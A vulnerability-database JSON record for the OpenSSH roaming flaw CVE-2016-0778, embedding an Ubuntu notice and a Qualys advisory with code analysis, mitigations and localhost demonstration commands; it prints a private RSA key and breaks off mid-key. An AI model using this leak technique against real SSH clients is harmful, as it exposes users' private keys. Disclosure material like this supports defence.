"cpe:2.3:a:openbsd:openssh:6.2:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.9.5", "versionStartIncluding": "10.9.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.10.5", "versionStartIncluding": "10.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.11.3", "versionStartIncluding": "10.11.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:hp:virtual_customer_access_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.07", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.353:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-0778" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Qualys Security Advisory team", "sources": [ { "db": "BID", "id": "80698" } ], "trust": 0.3 }, "cve": "CVE-2016-0778", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 4.6, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2016-0778", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "VHN-88288", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.1, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2016-0778", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-0778", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-250", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-88288", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-0778", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. \nSuccessful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================\nUbuntu Security Notice USN-2869-1\nJanuary 14, 2016\n\nopenssh vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nOpenSSH could be made to expose sensitive information over the network. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n openssh-client 1:6.9p1-2ubuntu0.1\n\nUbuntu 15.04:\n openssh-client 1:6.7p1-5ubuntu1.4\n\nUbuntu 14.04 LTS:\n openssh-client 1:6.6p1-2ubuntu2.4\n\nUbuntu 12.04 LTS:\n openssh-client 1:5.9p1-5ubuntu1.8\n\nIn general, a standard system update will make all the necessary changes. \nQualys Security Advisory\n\nRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nInformation Leak (CVE-2016-0777)\n- Analysis\n- Private Key Disclosure\n- Mitigating Factors\n- Examples\nBuffer Overflow (CVE-2016-0778)\n- Analysis\n- Mitigating Factors\n- File Descriptor Leak\nAcknowledgments\nProof Of Concept\n\n\n========================================================================\nSummary\n========================================================================\n\nSince version 5.4 (released on March 8, 2010), the OpenSSH client\nsupports an undocumented feature called roaming: if the connection to an\nSSH server breaks unexpectedly, and if the server supports roaming as\nwell, the client is able to reconnect to the server and resume the\nsuspended SSH session. This information leak may have already been exploited in\nthe wild by sophisticated attackers, and high-profile sites or users may\nneed to regenerate their SSH keys accordingly. \n\nThe buffer overflow, on the other hand, is present in the default\nconfiguration of the OpenSSH client but its exploitation requires two\nnon-default options: a ProxyCommand, and either ForwardAgent (-A) or\nForwardX11 (-X). This buffer overflow is therefore unlikely to have any\nreal-world impact, but provides a particularly interesting case study. \n\nAll OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be\neasily hot-fixed by setting the undocumented option \"UseRoaming\" to\n\"no\", as detailed in the Mitigating Factors section. OpenSSH version\n7.1p2 (released on January 14, 2016) disables roaming by default. \n\n\n========================================================================\nInformation Leak (CVE-2016-0777)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nIf the OpenSSH client connects to an SSH server that offers the key\nexchange algorithm \"resume@appgate.com\", it sends the global request\n\"roaming@appgate.com\" to the server, after successful authentication. If\nthis request is accepted, the client allocates a roaming buffer out_buf,\nby calling malloc() (and not calloc()) with an out_buf_size that is\narbitrarily chosen by the server:\n\n 63 void\n 64 roaming_reply(int type, u_int32_t seq, void *ctxt)\n 65 {\n 66 if (type == SSH2_MSG_REQUEST_FAILURE) {\n 67 logit(\"Server denied roaming\");\n 68 return;\n 69 }\n 70 verbose(\"Roaming enabled\");\n .. \n 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size());\n .. \n 77 }\n\n 40 static size_t out_buf_size = 0;\n 41 static char *out_buf = NULL;\n 42 static size_t out_start;\n 43 static size_t out_last;\n .. \n 75 void\n 76 set_out_buffer_size(size_t size)\n 77 {\n 78 if (size == 0 || size \u003e MAX_ROAMBUF)\n 79 fatal(\"%s: bad buffer size %lu\", __func__, (u_long)size);\n 80 /*\n 81 * The buffer size can only be set once and the buffer will live\n 82 * as long as the session lives. \n 83 */\n 84 if (out_buf == NULL) {\n 85 out_buf_size = size;\n 86 out_buf = xmalloc(size);\n 87 out_start = 0;\n 88 out_last = 0;\n 89 }\n 90 }\n\nThe OpenSSH client\u0027s roaming_write() function, a simple wrapper around\nwrite(), calls wait_for_roaming_reconnect() to transparently reconnect\nto the SSH server after a disconnection. It also calls buf_append() to\ncopy the data sent to the server into the roaming buffer out_buf. During\na reconnection, the client is therefore able to resend the data that was\nnot received by the server because of the disconnection:\n\n198 void\n199 resend_bytes(int fd, u_int64_t *offset)\n200 {\n201 size_t available, needed;\n202\n203 if (out_start \u003c out_last)\n204 available = out_last - out_start;\n205 else\n206 available = out_buf_size;\n207 needed = write_bytes - *offset;\n208 debug3(\"resend_bytes: resend %lu bytes from %llu\",\n209 (unsigned long)needed, (unsigned long long)*offset);\n210 if (needed \u003e available)\n211 fatal(\"Needed to resend more data than in the cache\");\n212 if (out_last \u003c needed) {\n213 int chunkend = needed - out_last;\n214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend,\n215 chunkend);\n216 atomicio(vwrite, fd, out_buf, out_last);\n217 } else {\n218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed);\n219 }\n220 }\n\nIn the OpenSSH client\u0027s roaming buffer out_buf, the most recent data\nsent to the server begins at index out_start and ends at index out_last. \nAs soon as this circular buffer is full, buf_append() maintains the\ninvariant \"out_start = out_last + 1\", and consequently three different\ncases have to be considered:\n\n- \"out_start \u003c out_last\" (lines 203-204): out_buf is not full yet (and\n out_start is still equal to 0), and the amount of data available in\n out_buf is indeed \"out_last - out_start\";\n\n- \"out_start \u003e out_last\" (lines 205-206): out_buf is full (and out_start\n is exactly equal to \"out_last + 1\"), and the amount of data available\n in out_buf is indeed the entire out_buf_size;\n\n- \"out_start == out_last\" (lines 205-206): no data was ever written to\n out_buf (and both out_start and out_last are still equal to 0) because\n no data was ever sent to the server after roaming_reply() was called,\n but the client sends (leaks) the entire uninitialized out_buf to the\n server (line 214), as if out_buf_size bytes of data were available. \n\nIn order to successfully exploit this information leak and retrieve\nsensitive information from the OpenSSH client\u0027s memory (for example,\nprivate SSH keys, or memory addresses useful for further exploitation),\na malicious server needs to:\n\n- Massage the client\u0027s heap before roaming_reply() malloc()ates out_buf,\n and force malloc() to return a previously free()d but uncleansed chunk\n of sensitive information. The simple proof-of-concept in this advisory\n does not implement heap massaging. \n\n- Guess the client\u0027s get_snd_buf_size() in order to precisely control\n out_buf_size. OpenSSH \u003c 6.0 accepts out_buf sizes in the range (0,4G),\n and OpenSSH \u003e= 6.0 accepts sizes in the range (0,2M]. Sizes smaller\n than get_snd_buf_size() are attainable because roaming_reply() does\n not protect \"packet_get_int() + get_snd_buf_size()\" against integer\n wraparound. The proof-of-concept in this advisory attempts to derive\n the client\u0027s get_snd_buf_size() from the get_recv_buf_size() sent by\n the client to the server, and simply chooses a random out_buf_size. \n\n- Advise the client\u0027s resend_bytes() that all \"available\" bytes (the\n entire out_buf_size) are \"needed\" by the server, even if fewer bytes\n were actually written by the client to the server (because the server\n controls the \"*offset\" argument, and resend_bytes() does not protect\n \"needed = write_bytes - *offset\" against integer wraparound). \n\nFinally, a brief digression on a minor bug in resend_bytes(): on 64-bit\nsystems, where \"chunkend\" is a 32-bit signed integer, but \"out_buf\" and\n\"out_buf_size\" are 64-bit variables, \"out_buf + out_buf_size - chunkend\"\nmay point out-of-bounds, if chunkend is negative (if out_buf_size is in\nthe [2G,4G) range). This negative chunkend is then converted to a 64-bit\nsize_t greater than SSIZE_MAX when passed to atomicio(), and eventually\nreturns EFAULT when passed to write() (at least on Linux and OpenBSD),\nthus avoiding an out-of-bounds read from the OpenSSH client\u0027s memory. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure\n------------------------------------------------------------------------\n\nWe initially believed that this information leak in the OpenSSH client\u0027s\nroaming code would not allow a malicious SSH server to steal the\nclient\u0027s private keys, because:\n\n- the information leaked is not read from out-of-bounds memory, but from\n a previously free()d chunk of memory that is recycled to malloc()ate\n the client\u0027s roaming buffer out_buf;\n\n- private keys are loaded from disk into memory and freed by key_free()\n (old API, OpenSSH \u003c 6.7) or sshkey_free() (new API, OpenSSH \u003e= 6.7),\n and both functions properly cleanse the private keys\u0027 memory with\n OPENSSL_cleanse() or explicit_bzero();\n\n- temporary copies of in-memory private keys are freed by buffer_free()\n (old API) or sshbuf_free() (new API), and both functions attempt to\n cleanse these copies with memset() or bzero(). \n\nHowever, we eventually identified three reasons why, in our experiments,\nwe were able to partially or completely retrieve the OpenSSH client\u0027s\nprivate keys through this information leak (depending on the client\u0027s\nversion, compiler, operating system, heap layout, and private keys):\n\n(besides these three reasons, other reasons may exist, as suggested by\nthe CentOS and Fedora examples at the end of this section)\n\n1. If a private SSH key is loaded from disk into memory by fopen() (or\nfdopen()), fgets(), and fclose(), a partial or complete copy of this\nprivate key may remain uncleansed in memory. Indeed, these functions\nmanage their own internal buffers, and whether these buffers are\ncleansed or not depends on the OpenSSH client\u0027s libc (stdio)\nimplementation, but not on OpenSSH itself. \n\n- In all vulnerable OpenSSH versions, SSH\u0027s main() function calls\n load_public_identity_files(), which loads the client\u0027s public keys\n with fopen(), fgets(), and fclose(). Unfortunately, the private keys\n (without the \".pub\" suffix) are loaded first and then discarded, but\n nonetheless buffered in memory by the stdio functions. \n\n- In OpenSSH versions \u003c= 5.6, the load_identity_file() function (called\n by the client\u0027s public-key authentication method) loads a private key\n with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses\n fgets() and hence internal stdio buffering. \n\nInternal stdio buffering is the most severe of the three problems\ndiscussed in this section, although GNU/Linux is not affected because\nthe glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. \nBSD-based systems, on the other hand, are severely affected because they\nsimply malloc()ate and free() stdio buffers. For interesting comments on\nthis issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk\n\n2. In OpenSSH versions \u003e= 5.9, the client\u0027s load_identity_file()\nfunction (called by the public-key authentication method) read()s a\nprivate key in 1024-byte chunks that are appended to a growing buffer (a\nrealloc()ating buffer) with buffer_append() (old API) or sshbuf_put()\n(new API). Unfortunately, the repeated calls to realloc() may leave\npartial copies of the private key uncleansed in memory. \n\n- In OpenSSH \u003c 6.7 (old API), the initial size of such a growing buffer\n is 4096 bytes: if a private-key file is larger than 4K, a partial copy\n of this private key may remain uncleansed in memory (a 3K copy in a 4K\n buffer). Fortunately, only the file of a very large RSA key (for\n example, an 8192-bit RSA key) can exceed 4K. \n\n- In OpenSSH \u003e= 6.7 (new API), the initial size of a growing buffer is\n 256 bytes: if a private-key file is larger than 1K (the size passed to\n read()), a partial copy of this private key may remain uncleansed in\n memory (a 1K copy in a 1K buffer). For example, the file of a\n default-sized 2048-bit RSA key exceeds 1K. \n\nFor more information on this issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources\n\nhttps://cwe.mitre.org/data/definitions/244.html\n\n3. An OpenSSH growing-buffer that holds a private key is eventually\nfreed by buffer_free() (old API) or sshbuf_free() (new API), and both\nfunctions attempt to cleanse the buffer with memset() or bzero() before\nthey call free(). Unfortunately, an optimizing compiler may remove this\nmemset() or bzero() call, because the buffer is written to, but never\nagain read from (an optimization known as Dead Store Elimination). \n\nOpenSSH 6.6 is the only version that is not affected, because it calls\nexplicit_bzero() instead of memset() or bzero(). \n\nDead Store Elimination is the least severe of the three problems\nexplored in this section, because older GCC versions do not remove the\nmemset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5\nand Clang/LLVM do, however, remove it. For detailed discussions of this\nissue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations\n\nhttps://cwe.mitre.org/data/definitions/14.html\n\nhttps://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506\n\nFinally, for these three reasons, passphrase-encrypted SSH keys are\nleaked in their encrypted form, but an attacker may attempt to crack the\npassphrase offline. On the other hand, SSH keys that are available only\nthrough an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or command-line (-o \"UseRoaming no\"). \n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak:\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume]^Z\n[1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak:\n\n$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.ls\"\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.tar\"\ntar: Removing leading `/\u0027 from member names\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n... \n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\nSimilarly, the SCP client uses the SSH client\u0027s stdin and stdout to\ntransfer data, and can be forced by a malicious SSH server to output a\ncontrol record that ends in \u0027\\n\u0027 (an error message in server-to-client\nmode, or file permissions in client-to-server mode); this \u0027\\n\u0027 is then\nread from stdin by the fgetc() call in wait_for_roaming_reconnect(), and\ntriggers an automatic reconnection that allows the information leak to\nbe exploited without user interaction:\n\n# env ROAMING=\"scp_mode sleep:1\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp\n$ [connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\nlost connection\n\n3. Although a man-in-the-middle attacker can reset the TCP connection\nbetween an OpenSSH client and an OpenSSH server (which does not support\nroaming), it cannot exploit the information leak without breaking server\nhost authentication or integrity protection, because it needs to:\n\n- first, append the \"resume@appgate.com\" algorithm name to the server\u0027s\n initial key exchange message;\n\n- second, in response to the client\u0027s \"roaming@appgate.com\" request,\n change the server\u0027s reply from failure to success. \n\nIn conclusion, an attacker who wishes to exploit this information leak\nmust convince its target OpenSSH client to connect to a malicious server\n(an unlikely scenario), or compromise a trusted server (a more likely\nscenario, for a determined attacker). \n\n4. In the client, wait_for_roaming_reconnect()\ncalls ssh_connect(), the same function that successfully established the\nfirst connection to the server; this function supports four different\nconnection methods, but each method contains a bug and may fail to\nestablish a second connection to the server:\n\n- In OpenSSH \u003e= 6.5 (released on January 30, 2014), the default\n ssh_connect_direct() method (a simple TCP connection) is called by\n wait_for_roaming_reconnect() with a NULL aitop argument, which makes\n it impossible for the client to reconnect to the server:\n\n 418 static int\n 419 ssh_connect_direct(const char *host, struct addrinfo *aitop,\n ... \n 424 int sock = -1, attempt;\n 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV];\n ... \n 430 for (attempt = 0; attempt \u003c connection_attempts; attempt++) {\n ... \n 440 for (ai = aitop; ai; ai = ai-\u003eai_next) {\n ... \n 470 }\n 471 if (sock != -1)\n 472 break; /* Successful connection. */\n 473 }\n 474\n 475 /* Return failure if we didn\u0027t get a successful connection. */\n 476 if (sock == -1) {\n 477 error(\"ssh: connect to host %s port %s: %s\",\n 478 host, strport, strerror(errno));\n 479 return (-1);\n 480 }\n\n Incidentally, this error() call displays stack memory from the\n uninitialized strport[] array, a byproduct of the NULL aitop:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n\n- The special ProxyCommand \"-\" communicates with the server through the\n client\u0027s stdin and stdout, but these file descriptors are close()d by\n packet_backup_state() at the beginning of wait_for_roaming_reconnect()\n and are never reopened again, making it impossible for the client to\n reconnect to the server. Moreover, the fgetc() that waits for \u0027\\n\u0027 or\n \u0027\\r\u0027 on the closed stdin returns EOF and forces the client to exit():\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/nc -e \"/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1\" 127.0.0.1 222\nPseudo-terminal will not be allocated because stdin is not a terminal. \nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that\n passes a connected file descriptor back to the client, but it calls\n fatal() while reconnecting to the server, because waitpid() returns\n ECHILD; indeed, the SIGCHLD handler (installed by SSH\u0027s main() after\n the first successful connection to the server) calls waitpid() before\n ssh_proxy_fdpass_connect() does:\n\n1782 static void\n1783 main_sigchld_handler(int sig)\n1784 {\n.... \n1789 while ((pid = waitpid(-1, \u0026status, WNOHANG)) \u003e 0 ||\n1790 (pid \u003c 0 \u0026\u0026 errno == EINTR))\n1791 ;\n1792\n1793 signal(sig, main_sigchld_handler);\n.... \n1795 }\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 121 /* Fork and execute the proxy command. */\n 122 if ((pid = fork()) == 0) {\n ... \n 157 }\n 158 /* Parent. */\n ... \n 167 while (waitpid(pid, NULL, 0) == -1)\n 168 if (errno != EINTR)\n 169 fatal(\"Couldn\u0027t wait for child: %s\", strerror(errno));\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015\n\n$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand=\"/usr/bin/nc -F %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Couldn\u0027t wait for child: No child processes\n\n- The method ssh_proxy_connect() fork()s a standard ProxyCommand that\n connects the client to the server, but if a disconnection occurs, and\n the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is\n waiting for a \u0027\\n\u0027 or \u0027\\r\u0027 on stdin, EOF is returned (the underlying\n read() returns EINTR) and the client exit()s before it can reconnect\n to the server:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh -o ProxyCommand=\"/bin/nc %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n This behavior is intriguing, because (at least on Linux and BSD) the\n signal() call that installed the main_sigchld_handler() is supposed to\n be equivalent to a sigaction() call with SA_RESTART. However, portable\n versions of OpenSSH override signal() with mysignal(), a function that\n calls sigaction() without SA_RESTART. \n\n This last mitigating factor is actually a race-condition bug that\n depends on the ProxyCommand itself: for example, the client never\n fails to reconnect to the server when using Socat as a ProxyCommand,\n but fails occasionally when using Netcat. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\nvOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi\n/rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE\nK+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr\n+7TZERv+bZXaq3UP